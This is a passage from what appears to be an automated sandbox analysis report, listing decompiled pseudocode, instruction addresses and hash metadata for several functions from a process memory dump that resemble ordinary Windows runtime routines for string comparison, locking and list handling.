							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                          0x011752a5
                                                                          0x011752ad
                                                                          0x011752b0
                                                                          0x011752b3
                                                                          0x011752b7
                                                                          0x011752ba
                                                                          0x011752bf
                                                                          0x011752c4
                                                                          0x011752cc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011752ce
                                                                          0x011752d9
                                                                          0x011752dd
                                                                          0x011752e7
                                                                          0x011752f7
                                                                          0x011752f9
                                                                          0x011752fd
                                                                          0x011d0dcf
                                                                          0x011d0dd5
                                                                          0x011d0dd6
                                                                          0x011d0dd7
                                                                          0x011d0dd8
                                                                          0x011d0dd9
                                                                          0x011d0dde
                                                                          0x011d0ddf
                                                                          0x011d0de0
                                                                          0x011d0de1
                                                                          0x011d0de2
                                                                          0x011d0de5
                                                                          0x011d0dea
                                                                          0x011d0dec
                                                                          0x011d0f60
                                                                          0x011d0f64
                                                                          0x011d0f70
                                                                          0x011d0f76
                                                                          0x011d0f79
                                                                          0x011d0f79
                                                                          0x00000000
                                                                          0x011d0f64
                                                                          0x011d0df2
                                                                          0x011d0df7
                                                                          0x011d0e04
                                                                          0x011d0e0d
                                                                          0x011d0e0d
                                                                          0x011d0e10
                                                                          0x011d0e1a
                                                                          0x011d0e1c
                                                                          0x011d0e4c
                                                                          0x011d0e52
                                                                          0x011d0e61
                                                                          0x011d0e67
                                                                          0x011d0e6b
                                                                          0x011d0e70
                                                                          0x011d0e76
                                                                          0x011d0ed7
                                                                          0x011d0edc
                                                                          0x011d0ee0
                                                                          0x011d0ee6
                                                                          0x011d0eea
                                                                          0x011d0eed
                                                                          0x011d0ef0
                                                                          0x011d0ef3
                                                                          0x011d0ef6
                                                                          0x011d0ef9
                                                                          0x011d0efe
                                                                          0x011d0f01
                                                                          0x011d0f01
                                                                          0x011d0f0b
                                                                          0x011d0f12
                                                                          0x011d0f16
                                                                          0x011d0f18
                                                                          0x011d0f1b
                                                                          0x011d0f2c
                                                                          0x011d0f31
                                                                          0x011d0f31
                                                                          0x011d0f35
                                                                          0x011d0f39
                                                                          0x011d0f3a
                                                                          0x011d0f3c
                                                                          0x011d0f3f
                                                                          0x011d0f50
                                                                          0x011d0f55
                                                                          0x011d0f55
                                                                          0x011d0f59
                                                                          0x011752eb
                                                                          0x011752f1
                                                                          0x011752f1
                                                                          0x011d0e7d
                                                                          0x011d0e84
                                                                          0x011d0e88
                                                                          0x011d0e8a
                                                                          0x011d0e8d
                                                                          0x011d0e9e
                                                                          0x011d0ea3
                                                                          0x011d0ea3
                                                                          0x011d0ea7
                                                                          0x011d0eaf
                                                                          0x011d0eb3
                                                                          0x011d0eb9
                                                                          0x011d0eb9
                                                                          0x011d0ebc
                                                                          0x011d0ecd
                                                                          0x011d0ecd
                                                                          0x00000000
                                                                          0x011d0eb3
                                                                          0x011d0e21
                                                                          0x011d0e2b
                                                                          0x011d0e2f
                                                                          0x011d0e30
                                                                          0x011d0e3a
                                                                          0x011d0e3f
                                                                          0x011d0e41
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d0e47
                                                                          0x00000000
                                                                          0x011d0e47
                                                                          0x011d0df9
                                                                          0x011d0dfe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d0dfe
                                                                          0x01175303
                                                                          0x01175307
                                                                          0x00000000
                                                                          0x01175309
                                                                          0x00000000
                                                                          0x01175309
                                                                          0x01175307
                                                                          0x011752e9
                                                                          0x011752e9
                                                                          0x00000000
                                                                          0x011752e9
                                                                          0x0117530e
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cbf992f084a86de9acc29304c6ae8432e8171dcf836c94f6dd90f3b3dc7e6ec5
                                                                          • Instruction ID: 2adccd0ee739e7499938b0fc01333317906300e41531c9c36a2f012f04091c52
                                                                          • Opcode Fuzzy Hash: cbf992f084a86de9acc29304c6ae8432e8171dcf836c94f6dd90f3b3dc7e6ec5
                                                                          • Instruction Fuzzy Hash: FD510D70246742EBD729EF28C844B2BBBE5FF58718F14491EF59583691E770E840CBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A2AE4, Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011A2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1268204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1268208; // 0x1268207
				_t8 = _t57 + 0x1268208; // 0x1268207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1268450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x126821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1266d5c; // 0x7f740654
							_t72 =  *0x1266d5c; // 0x7f740654
							_t75 =  *0x1266d5c; // 0x7f740654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1266d5c; // 0x7f740654
							_t84 =  *0x1266d5c; // 0x7f740654
							_t87 =  *0x1266d5c; // 0x7f740654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E011BF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                          0x011a2ae4
                                                                          0x011a2aec
                                                                          0x011a2aef
                                                                          0x011a2af4
                                                                          0x011a2af7
                                                                          0x011a2afd
                                                                          0x011a2b92
                                                                          0x011a2b92
                                                                          0x011a2b97
                                                                          0x011a2b9c
                                                                          0x011a2b9c
                                                                          0x011a2b03
                                                                          0x011a2b06
                                                                          0x011a2b09
                                                                          0x011a2b09
                                                                          0x011a2b0f
                                                                          0x011a2b15
                                                                          0x011a2b15
                                                                          0x011a2b1b
                                                                          0x011a2b1e
                                                                          0x011a2b21
                                                                          0x011a2b26
                                                                          0x011a2b29
                                                                          0x011a2b81
                                                                          0x011a2b84
                                                                          0x011a2c0e
                                                                          0x011a2c15
                                                                          0x011a2c24
                                                                          0x011a2c24
                                                                          0x011a2b8a
                                                                          0x011a2b8a
                                                                          0x011a2b8a
                                                                          0x011a2b8a
                                                                          0x011a2b90
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2b4a
                                                                          0x011a2b4a
                                                                          0x011a2b4d
                                                                          0x011a2b53
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2b55
                                                                          0x011a2b58
                                                                          0x011a2bb7
                                                                          0x011e5d1b
                                                                          0x011e5d37
                                                                          0x011e5d47
                                                                          0x011e5d53
                                                                          0x011a2bbd
                                                                          0x011a2bbd
                                                                          0x011a2bbd
                                                                          0x011a2bb7
                                                                          0x011a2b5d
                                                                          0x011a2c2f
                                                                          0x011e5d5b
                                                                          0x011e5d77
                                                                          0x011e5d87
                                                                          0x011e5d93
                                                                          0x011a2c35
                                                                          0x011a2c35
                                                                          0x011a2c35
                                                                          0x011a2c2f
                                                                          0x011a2b65
                                                                          0x011a2b9f
                                                                          0x011a2ba2
                                                                          0x011a2b67
                                                                          0x011a2b67
                                                                          0x011a2b69
                                                                          0x011a2b6b
                                                                          0x011a2b6e
                                                                          0x011a2bc9
                                                                          0x011a2bcc
                                                                          0x011a2bcf
                                                                          0x011a2bd4
                                                                          0x011a2bd6
                                                                          0x011a2bd6
                                                                          0x011a2bdb
                                                                          0x011a2c02
                                                                          0x011a2c05
                                                                          0x011a2c07
                                                                          0x00000000
                                                                          0x011a2c07
                                                                          0x011a2be0
                                                                          0x011a2c00
                                                                          0x011a2c3f
                                                                          0x011a2c3f
                                                                          0x00000000
                                                                          0x011a2c00
                                                                          0x011a2be5
                                                                          0x011a2be7
                                                                          0x011a2bec
                                                                          0x011a2bf4
                                                                          0x011a2bf6
                                                                          0x00000000
                                                                          0x011a2bf6
                                                                          0x011a2b70
                                                                          0x011a2b76
                                                                          0x011a2b2b
                                                                          0x011a2b2b
                                                                          0x011a2b2d
                                                                          0x011a2b2f
                                                                          0x011a2b32
                                                                          0x011a2b35
                                                                          0x011a2b3a
                                                                          0x00000000
                                                                          0x011a2b40
                                                                          0x011a2b43
                                                                          0x011a2b45
                                                                          0x011a2b47
                                                                          0x011a2b4a
                                                                          0x011a2b4d
                                                                          0x011a2b53
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2b53
                                                                          0x011a2b78
                                                                          0x011a2b78
                                                                          0x011a2b7b
                                                                          0x011a2b7e
                                                                          0x00000000
                                                                          0x011a2b7e
                                                                          0x011a2b76
                                                                          0x011a2ba5
                                                                          0x011a2ba5
                                                                          0x011a2ba8
                                                                          0x011a2bad
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2baf
                                                                          0x011a2baf
                                                                          0x011a2bc2
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2bd8762a8367dcc95894155984c068fa4fa82728117d9c0af1054cb360015e2
                                                                          • Instruction ID: 2410d844bd3a5373574201c8742277fb95c82156cf7444005e0b1af555ff941b
                                                                          • Opcode Fuzzy Hash: c2bd8762a8367dcc95894155984c068fa4fa82728117d9c0af1054cb360015e2
                                                                          • Instruction Fuzzy Hash: C151B17AB00115CFCB2CCF1CC8949BDBBB1FB88700B56845AE846DB365D734AA51CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118EF40, Relevance: .1, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E0118EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01179080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x772ac21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01172D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                          0x0118ef4b
                                                                          0x0118ef4d
                                                                          0x0118ef57
                                                                          0x0118f0bd
                                                                          0x0118f0c2
                                                                          0x0118f0d2
                                                                          0x0118f0d2
                                                                          0x0118f0c2
                                                                          0x0118ef5d
                                                                          0x0118ef5f
                                                                          0x0118ef67
                                                                          0x0118ef6a
                                                                          0x0118ef6d
                                                                          0x0118ef74
                                                                          0x0118ef7f
                                                                          0x0118ef82
                                                                          0x0118ef82
                                                                          0x0118ef86
                                                                          0x0118ef88
                                                                          0x0118ef8c
                                                                          0x0118ef8f
                                                                          0x0118ef8f
                                                                          0x0118ef8f
                                                                          0x00000000
                                                                          0x0118ef91
                                                                          0x0118ef93
                                                                          0x0118efc4
                                                                          0x0118efc4
                                                                          0x0118efc4
                                                                          0x0118efca
                                                                          0x0118efd0
                                                                          0x0118f0a6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118f0af
                                                                          0x011dbb06
                                                                          0x011dbb0a
                                                                          0x0118f0b5
                                                                          0x0118f0b5
                                                                          0x0118f0b5
                                                                          0x0118f0b5
                                                                          0x00000000
                                                                          0x0118efd6
                                                                          0x0118efd9
                                                                          0x0118f0de
                                                                          0x0118f0e2
                                                                          0x0118efdf
                                                                          0x0118efdf
                                                                          0x0118efdf
                                                                          0x0118efe5
                                                                          0x011dbafc
                                                                          0x011dbafc
                                                                          0x0118efe5
                                                                          0x0118efeb
                                                                          0x0118efed
                                                                          0x0118f00f
                                                                          0x0118f011
                                                                          0x0118f01a
                                                                          0x0118f01d
                                                                          0x0118f021
                                                                          0x0118f028
                                                                          0x0118f029
                                                                          0x0118f029
                                                                          0x0118f02c
                                                                          0x00000000
                                                                          0x0118f02c
                                                                          0x0118eff3
                                                                          0x0118eff9
                                                                          0x0118f0ea
                                                                          0x0118f0ed
                                                                          0x0118f0ef
                                                                          0x00000000
                                                                          0x0118f0ef
                                                                          0x0118f003
                                                                          0x011dbb12
                                                                          0x0118f045
                                                                          0x0118f049
                                                                          0x0118f051
                                                                          0x0118f09e
                                                                          0x0118f0a0
                                                                          0x0118f0a0
                                                                          0x0118f09e
                                                                          0x0118f053
                                                                          0x0118f064
                                                                          0x0118f064
                                                                          0x0118f06b
                                                                          0x011dbb1a
                                                                          0x011dbb1a
                                                                          0x0118f071
                                                                          0x0118f071
                                                                          0x0118f07d
                                                                          0x0118f082
                                                                          0x0118f08f
                                                                          0x0118f08f
                                                                          0x0118f009
                                                                          0x0118f00d
                                                                          0x00000000
                                                                          0x0118f00d
                                                                          0x0118efd0
                                                                          0x0118ef97
                                                                          0x0118efa5
                                                                          0x0118efaa
                                                                          0x00000000
                                                                          0x0118efac
                                                                          0x0118efac
                                                                          0x0118efac
                                                                          0x00000000
                                                                          0x0118efb2
                                                                          0x0118f036
                                                                          0x0118f03a
                                                                          0x0118f040
                                                                          0x0118f090
                                                                          0x00000000
                                                                          0x0118f092
                                                                          0x0118f042
                                                                          0x00000000
                                                                          0x0118f042
                                                                          0x0118efb7
                                                                          0x0118efb9
                                                                          0x0118efbc
                                                                          0x0118efb0
                                                                          0x0118efb0
                                                                          0x00000000
                                                                          0x0118efbe
                                                                          0x0118efbe
                                                                          0x0118efc1
                                                                          0x00000000
                                                                          0x0118efc1
                                                                          0x0118efbc
                                                                          0x0118efaa
                                                                          0x0118ef91

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                          • Instruction ID: 289f3c87c84f5ad6ae5461176c757b39810a77a44882d76b8d2130927cbec020
                                                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                          • Instruction Fuzzy Hash: 3C510730A0524ADFDB2DDB6CC0D07AEBBB2AF45314F15C1A8D54557382C375A98ACF42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0124740D, Relevance: .1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 84%
                                                                          			E0124740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E011CD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E011BF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01194620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01194620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E011BF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01194620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                          0x0124740d
                                                                          0x0124740d
                                                                          0x01247412
                                                                          0x01247413
                                                                          0x01247416
                                                                          0x01247418
                                                                          0x0124741c
                                                                          0x0124741f
                                                                          0x01247422
                                                                          0x01247422
                                                                          0x01247428
                                                                          0x0124742a
                                                                          0x0124742a
                                                                          0x01247451
                                                                          0x01247432
                                                                          0x0124744f
                                                                          0x0124744f
                                                                          0x00000000
                                                                          0x01247434
                                                                          0x01247438
                                                                          0x01247443
                                                                          0x01247517
                                                                          0x01247517
                                                                          0x0124751a
                                                                          0x01247535
                                                                          0x01247520
                                                                          0x01247527
                                                                          0x0124752c
                                                                          0x01247531
                                                                          0x01247533
                                                                          0x00000000
                                                                          0x01247533
                                                                          0x00000000
                                                                          0x01247531
                                                                          0x0124754b
                                                                          0x0124754f
                                                                          0x0124755c
                                                                          0x0124755c
                                                                          0x0124755f
                                                                          0x01247560
                                                                          0x01247561
                                                                          0x01247562
                                                                          0x01247563
                                                                          0x01247568
                                                                          0x0124756a
                                                                          0x0124756c
                                                                          0x0124756d
                                                                          0x0124756d
                                                                          0x0124756f
                                                                          0x01247572
                                                                          0x01247574
                                                                          0x01247577
                                                                          0x0124757c
                                                                          0x0124757f
                                                                          0x00000000
                                                                          0x01247551
                                                                          0x01247551
                                                                          0x01247551
                                                                          0x01247553
                                                                          0x01247553
                                                                          0x01247449
                                                                          0x01247449
                                                                          0x0124744c
                                                                          0x0124744c
                                                                          0x00000000
                                                                          0x0124744c
                                                                          0x01247443
                                                                          0x0124750e
                                                                          0x01247514
                                                                          0x01247514
                                                                          0x01247455
                                                                          0x01247469
                                                                          0x0124746d
                                                                          0x00000000
                                                                          0x01247473
                                                                          0x01247473
                                                                          0x01247476
                                                                          0x01247480
                                                                          0x01247484
                                                                          0x0124748e
                                                                          0x01247493
                                                                          0x01247493
                                                                          0x01247496
                                                                          0x01247499
                                                                          0x012474a1
                                                                          0x012474b1
                                                                          0x012474b5
                                                                          0x00000000
                                                                          0x012474bb
                                                                          0x012474c1
                                                                          0x012474c1
                                                                          0x012474c4
                                                                          0x012474c5
                                                                          0x012474c6
                                                                          0x012474c7
                                                                          0x012474c8
                                                                          0x012474cd
                                                                          0x00000000
                                                                          0x012474d3
                                                                          0x012474d3
                                                                          0x012474d6
                                                                          0x012474d8
                                                                          0x012474db
                                                                          0x012474dd
                                                                          0x012474e0
                                                                          0x012474e7
                                                                          0x012474ee
                                                                          0x012474ee
                                                                          0x012474f4
                                                                          0x012474f9
                                                                          0x00000000
                                                                          0x012474fb
                                                                          0x012474fb
                                                                          0x012474fd
                                                                          0x01247500
                                                                          0x01247503
                                                                          0x01247505
                                                                          0x01247505
                                                                          0x012474f9
                                                                          0x00000000
                                                                          0x012474cd
                                                                          0x012474b5
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                          • Instruction ID: 55aeb5a66f84a7b196749d69deb953d21abbadca65199d60d84521a88d9da504
                                                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                          • Instruction Fuzzy Hash: 01518F71510646DFDB1ACF18D580A95BBB5FF45308F14C0AAEA08DF212E371E946CBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A2990, Relevance: .1, Instructions: 133COMMON
                                                                          Download Yara Rule
